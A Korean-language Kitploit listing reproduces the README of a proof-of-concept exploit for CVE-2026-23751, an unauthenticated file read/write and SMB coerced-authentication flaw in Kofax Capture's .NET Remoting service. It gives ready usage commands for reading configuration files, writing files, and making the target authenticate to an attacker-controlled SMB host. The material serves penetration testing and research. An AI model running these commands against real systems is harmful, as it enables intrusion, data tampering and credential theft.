Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23751-poc — 패치된 RemotingClient로 CVE-2026-23751 악용 (Tungsten Automation - Kofax Capture의 .NET HTTP Remoting을 통한 인증 없는 파일 읽기/쓰기 및 SMB 강제 인증) | Kitploit
도구/GitHubGitHub/siebrum/cve-2026-23751-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

패치된 RemotingClient로 CVE-2026-23751 악용 (Tungsten Automation - Kofax Capture의 .NET HTTP Remoting을 통한 인증 없는 파일 읽기/쓰기 및 SMB 강제 인증)

저장소 보기
6시간 39분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-23751-poc

Code White의 NewRemotingTricks에 설명된 기법의 개념 증명(PoC) 재구현으로, Tungsten Automation Kofax Capture를 대상으로 합니다.

CVE-2026-23751

제목: Tungsten Automation - Kofax Capture .NET HTTP Remoting을 통한 인증 없는 파일 읽기/쓰기 및 SMB 강제 인증

CVE: CVE-2026-23751

설명

CVE-2026-23751은 Tungsten Automation Kofax Capture에 영향을 미치며, 인증되지 않은 원격 공격자가 Kofax Capture ACService가 노출하는 .NET HTTP Remoting 엔드포인트와 상호작용할 수 있게 합니다.

이 취약점은 다음과 같은 작업을 수행하는 데 악용될 수 있습니다:

  • 인증 없는 임의 파일 읽기
  • 인증 없는 임의 파일 쓰기
  • SMB 인증 강제
  • Kofax Capture 서비스가 접근할 수 있는 로컬 파일 접근
  • UNC 경로를 통한 원격 파일 접근

PoC는 Code White의 NewRemotingTricks 프로젝트에서 관련 .NET Remoting 기법을 재구현합니다.

영향을 받는 엔드포인트

PoC는 Kofax Capture ACService HTTP Remoting 엔드포인트를 대상으로 합니다:

root@kitploit:~
http://<target>:2424/ACService

포트 2424는 영향을 받는 서비스가 사용하는 기본 HTTP Remoting 포트입니다.

사용법

로컬 파일 읽기

다음 예제는 대상에서 Windows hosts 파일을 읽습니다:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

Kofax Capture 구성 파일도 유사하게 읽을 수 있습니다:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

로컬 파일 쓰기

대상 경로 뒤에 내용을 지정하여 Kofax Capture 서비스가 접근할 수 있는 위치에 파일을 쓸 수 있습니다:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

원격 SMB 공유에 쓰기

동일한 기능을 UNC 경로와 함께 사용하여 원격 SMB 공유에 쓸 수 있습니다:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

원격 리소스에 접근할 수 있는지 여부는 Kofax Capture 서비스의 권한 및 보안 컨텍스트에 따라 달라집니다.

SMB 강제 인증

file:// URI를 제공하여 대상이 원격 SMB 리소스에 접근하도록 유도할 수 있습니다:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

이로 인해 대상 환경 및 보안 구성에 따라 영향을 받는 호스트가 공격자가 제어하는 SMB 서버에 인증을 시도할 수 있습니다.

기술적 배경

이 취약점은 Kofax Capture의 ACService가 .NET HTTP Remoting을 사용하는 것과 관련이 있습니다.

.NET Remoting은 다양한 URI 스킴과 객체 직렬화 메커니즘을 지원합니다. 노출된 Remoting 엔드포인트와 특정 방식으로 상호작용함으로써, 인증되지 않은 클라이언트가 서비스로 하여금 클라이언트가 제공한 경로를 사용하여 파일 시스템 작업을 수행하도록 유도할 수 있습니다.

PoC는 이 동작을 다음과 같은 용도로 사용할 수 있음을 보여줍니다:

  • 로컬 파일 검색
  • 로컬 파일에 데이터 쓰기
  • 원격 UNC/SMB 경로 접근
  • 원격 file:// 리소스 접근 트리거

PoC는 현재 파일에 문자열 데이터를 쓰는 것을 시연합니다. 다른 파일 유형 및 페이로드 형식은 소스 코드를 적절히 수정하여 지원할 수 있습니다.

이 구현은 다음 연구 및 기법을 기반으로 합니다:

Code White - NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

요구 사항

  • Windows
  • 대상의 Kofax Capture ACService에 대한 네트워크 접근
  • 영향을 받는 HTTP Remoting 엔드포인트를 노출하는 Kofax Capture 인스턴스
  • RemotingClient_MBRO_Lazy.exe

악용을 위해 Kofax Capture 서비스에 대한 인증은 필요하지 않습니다.

면책 조항

이 저장소는 보안 연구, 취약점 검증 및 승인된 침투 테스트 목적으로만 제공됩니다.

명시적 승인 없이 이 PoC를 시스템에 사용하지 마십시오. 저자는 이 소프트웨어의 오용으로 인한 손상, 데이터 손실, 무단 접근 또는 기타 결과에 대해 책임을 지지 않습니다.

참고 자료

  • CVE-2026-23751 — Tungsten Automation Kofax Capture .NET HTTP Remoting을 통한 인증 없는 파일 읽기/쓰기 및 SMB 강제 인증
  • Code White - NewRemotingTricks
도구 다운로드